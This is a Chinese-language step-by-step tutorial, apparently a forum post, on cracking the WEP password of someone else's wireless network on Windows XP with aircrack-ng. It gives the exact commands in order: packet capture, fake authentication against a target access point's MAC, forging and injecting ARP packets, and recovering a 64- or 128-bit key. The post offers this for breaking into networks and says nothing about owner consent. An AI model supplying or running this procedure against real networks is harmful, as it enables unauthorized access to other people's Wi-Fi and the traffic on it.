無線破解

開放認證一般不需要合法客戶端！但有時候會出現破解不了的情況，如果這個時候有合法客戶端出現，而你又正在蒐集包的話成功率就100%了！            
什麼是開放認證？你在XP無線網卡搜索窗口搜索到了網絡，雙擊連接，如果出現了需要添加密碼的對話框，恭喜你，這個網絡就是開發式認證的WEP網路！如圖：         

         
如果是共享密鑰認證方式的WEP網絡，會提示你你連接的網絡不再服務區的紅色對發框，如圖：         

         
而你又反覆搜索都出現這個網絡，提醒下：一個地方如果哦有幾個同名的網絡出現，比如幾個TP-LINK都有，XP下的搜索窗口只會出現一個網路，而且是信號最好的一個網絡！            
下面以在XP平臺使用aircrack1.0爲例：            
羣空間有aircrack1.0下載，如果沒有向我呼叫！            
解壓這個文件放到C:下（主要是方便），最好是以aircrack爲文件夾就夠了，方便在dos下進度，所以你C:盤下就會出C:\aircrack這個文件夾名稱。            
然後你在XP平臺運行中輸入：cmd，進入DOS提示窗口，如下圖：            

            
進入aircrack這個文件夾內，你纔可以網站以後的操作！            
下面開始破解步驟：            
1、            
airserv-ng -d "commview.dll|debug"            
這個命令會提示你使用網卡，當然是選擇你的網絡網卡了（提示：支持的網卡就Atheros5004G\5005GS\5006XS等網卡，在使用這個命令前你得把你的網卡裝上軟件自帶的驅動Atheros Driver 4.2.2.104，你的設備管理器裏面將看到你的網卡成爲了：[CommView]Atheros5004G Wireless Network Adapter等，如果是5005GS當然就出現的是：[CommView]Atheros5005GS Wireless Network Adapter啦～～～～）如圖：           

            
選擇Y，使用你的網卡！

            
2、            
airodump-ng --channel 6 127.0.0.1:666            
另外打開一個cmd窗口，當然也是像上面一樣，進入你的aircrack文件夾裏，這個命令是搜索網絡，你將在cmd窗口內發現能搜索到的網絡，--channel 6 是使用6信道，這個你得自己選擇，如果你要破的網絡在11信道，那麼得改爲：airodump-ng --channel 11 127.0.0.1:666，127.0.0.1:666是端口，這個不改變，如果是在BT2下，這個端口就是ath1了，自己想想很簡單的！如圖：         

         

3、         
aireplay-ng -1 0 -e hai -a 00:1C:F0:4B:9D:48 -h 00:11:22:33:44:55 127.0.0.1:666         
hai 是網絡名稱！         
00:1C:F0:4B:9D:48 是他的mac地址！         
00:11:22:33:44:55 是你網卡的mac地址！         
另外打開一個cmd窗口，進入你的aircrack文件夾裏！        
如圖：         

         
只有連接成功以後纔可以下面繼續破解步驟，這步如果連接不成功，就不用接着破解了！         

4、         
aireplay-ng -5 -b 00:1C:F0:4B:9D:48 -h 00:11:22:33:44:55 127.0.0.1:666         
另外打開一個cmd窗口，進入你的aircrack文件夾裏！這個是抓包，生成虛假認證！         
如圖：        

        

5、        
packetforge-ng -0 -a 00:1C:F0:4B:9D:48 -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.1 -y fragment-0131-165326.xor -w arp        
另外打開一個cmd窗口，進入你的aircrack文件夾裏！這個是生產注入***的步驟！有了前面的xor文件後生產arp這個文件！        
如圖：        

        

6、aireplay-ng -2 -r arp 127.0.0.1:666        
另外打開一個cmd窗口，進入你的aircrack文件夾裏！        
***開始～～～～～～        
如圖：        

        
packets...前面的數字會不停的增長！        
7、airodump-ng -c 6 --bssid 00:1C:F0:4B:9D:48 -w capture 127.0.0.1:666        
另外打開一個cmd窗口，進入你的aircrack文件夾裏！抓包啦～～～～，其實這部可以在第3步是就可以使用，如果在第3步就開始使用的話，DATA值增長很慢，有可能一直爲0，但第6步的命令開始後你就會發現地2不命令中DATA值增長爆快！        
大概收集到25000的包就可以在10～30秒內破解出64位加密的WEP密碼了！當然如果是強密碼，那麼就得收集更多的包！        

8、aircrack-ng -n 64 capture-01.cap        
注意：第7步保存時是capture.cap，但生成的是capture-01.cap！所以破解時輸入的是capture-01.cap！！！！！        
如果是128位加密的話，命令變爲：aircrack-ng -n 128 capture-01.cap        

9、當出現密碼的時候，不如出現：6D:63:2E:6C:69 ,這個密碼我們在連接網絡的時候就去掉“：”，爲：6d632e6c69就可以了！不分大小寫的！是10位數，也就是64位加密的wep密碼了！  
10、破解成功了當然就是下面的圖啦～～～～～  
兩個密碼是一樣的！編碼方式不一樣！隨便你填什麼都可以連接，也就是不同的鑰匙開一個門而已！  
如圖：